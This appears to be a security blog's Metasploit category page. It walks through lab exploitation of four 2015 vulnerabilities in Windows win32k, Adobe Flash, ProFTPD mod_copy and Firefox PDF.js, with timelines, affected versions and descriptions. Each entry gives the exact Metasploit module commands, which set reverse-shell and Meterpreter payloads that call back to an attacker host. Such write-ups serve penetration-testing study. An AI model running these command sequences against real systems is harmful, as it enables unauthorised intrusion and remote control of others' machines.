Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2015-1701 Windows ClientCopyImage Win32k Exploit

Timeline :

Vulnerability discovered exploited in the wild by FireEye the 2015-04-13
Patch provided by the vendor via MS15-051 the 2015-05-12
PoC provided by hfiref0x the 2015-05-12
Metasploit PoC provided the 2015-06-03

PoC provided by :

Unknown
hfirefox
OJ Reeves
Spencer McIntyre

Reference(s) :

CVE-2015-1701
MS15-051

Affected version(s) :

Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation

Description :

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

Local privileges escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run

getuid

CVE-2015-3105 Adobe Flash Player Drawing Fill Shader Memory Corruption

Timeline :

Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 the 2015-06-09
Vulnerability discovered exploited in the Exploit Kits the 2015-06-16
Metasploit PoC provided the 2015-06-25

PoC provided by :

Chris Evans
Unknown
juan vazquez

Reference(s) :

CVE-2015-3105
APSB15-11

Affected version(s) :

Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188

Description :

This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Commands :

use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2015-3306 ProFTPD 1.3.5 Mod_Copy Command Execution

Timeline :

Vulnerability discovered and reported to the vendor by Vadim Melihow the 2015-04-07
Workaround provided by the vendor the 2015-04-07
Vulnerability details released the 2015-04-13
Metasploit PoC provided the 2015-04-22
Patch provided by the vendor the 2015-05-28

PoC provided by :

Vadim Melihow
xistence

Reference(s) :

CVE-2015-3306

Affected version(s) :

All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1

Tested on :

Centos 6.7 with ProFTPD 1.3.5

Description :

This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the ‘nobody’ user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

This vulnerability is only triggered in particular conditions:
– ProFTPD need to have the rights to write into a web accessible folder having the privileges of ProFTPD.
– SELinux must be disabled

Commands :

ProFTPD is running with user and group “nobody”
ProFTPD is configured with “LoadModule mod_copy.c” in proftpd.conf file
A “test” folder has been created in “/var/www/html/“ with nodody:nobody privileges

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.6.154
set SITEPATH /var/www/html/test
set TARGETURI /test/
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.6.138
run

id

Done !

MFSA-2015-42 Firefox PDF.js Privileged Javascript Injection

Timeline :

Vulnerability discovered and reported to the vendor by Bobby Holley
Patch provided by the vendor via MFSA-2015-42 the 2015-03-31
Metasploit PoC provided the 2015-08-16

PoC provided by :

Bobby Holley
Marius Mlynski
joev

Reference(s) :

CVE-2015-0802
MFSA-2015-42
CVE-2015-0816
MFSA-2015-33
ZDI-15-110

Affected version(s) :

Firefox versions bellow version 37

Tested on :

Windows 7 SP1 with Firefox version 36.0.4

Description :

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs (CVE-2015-0802). PDF.js (CVE-2015-0816) is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Commands :

use exploit/multi/browser/firefox_pdfjs_privilege_escalation
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp
set LHOST 192.168.6.138
run

SYSTEMINFO